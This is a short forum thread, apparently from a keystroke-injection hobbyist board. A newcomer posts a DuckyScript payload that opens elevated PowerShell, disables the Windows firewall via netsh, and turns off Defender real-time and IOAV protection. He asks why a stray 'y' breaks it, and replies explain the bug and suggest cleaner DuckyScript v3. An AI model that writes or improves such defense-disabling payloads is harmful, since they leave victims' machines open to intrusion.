Rusty_83 Posted May 24 Share Posted May 24 Hi, When I run the script below, Powershell states that 'ynetsh'is not a recognised command, yet the script correctly says 'netsh'. Any idea how I can correct this? (Sorry I'm obviously a newbie! :D) Cheers DELAY 1000 GUI r DELAY 500 STRING powershell CTRL SHIFT ENTER DELAY 1000 ALT y DELAY 1000 GUI r DELAY 500 STRING cmd ENTER DELAY 500 ALT y DELAY 500 STRING netsh advfirewall set allprofiles state off ENTER DELAY 1000 STRING powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true" ENTER DELAY 1000 STRING powershell -Command "Set-MpPreference -DisableIOAVProtection $true" ENTER DELAY 1000 STRING echo Windows 11 firewall, antivirus, and threat detection have been disabled successfully. ENTER Quote Link to comment Share on other sites More sharing options...
DramaKing Posted May 24 Share Posted May 24 Simple. The script opens the Run dialog to run PowerShell as an administrator. Then it opens a Command Prompt window and types 'y' into it before entering the netsh command. It's very messy. Quote Link to comment Share on other sites More sharing options...
Irukandji Posted May 24 Share Posted May 24 I've moved this out of the wrong place Quote Link to comment Share on other sites More sharing options...
dark_pyrro Posted May 24 Share Posted May 24 That payload code for sure needs some TLC from Mr Foose. One good way to start it to do everything manually in order to identify the commands that are actually needed to do the job, and not a bunch of stuff that isn't relevant. Then bake all of that into a delicious DuckyScript cake. The code can also be further optimized using the features that is available in DuckyScript v3. It will at least cut down the number of lines used and make the payload more readable. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.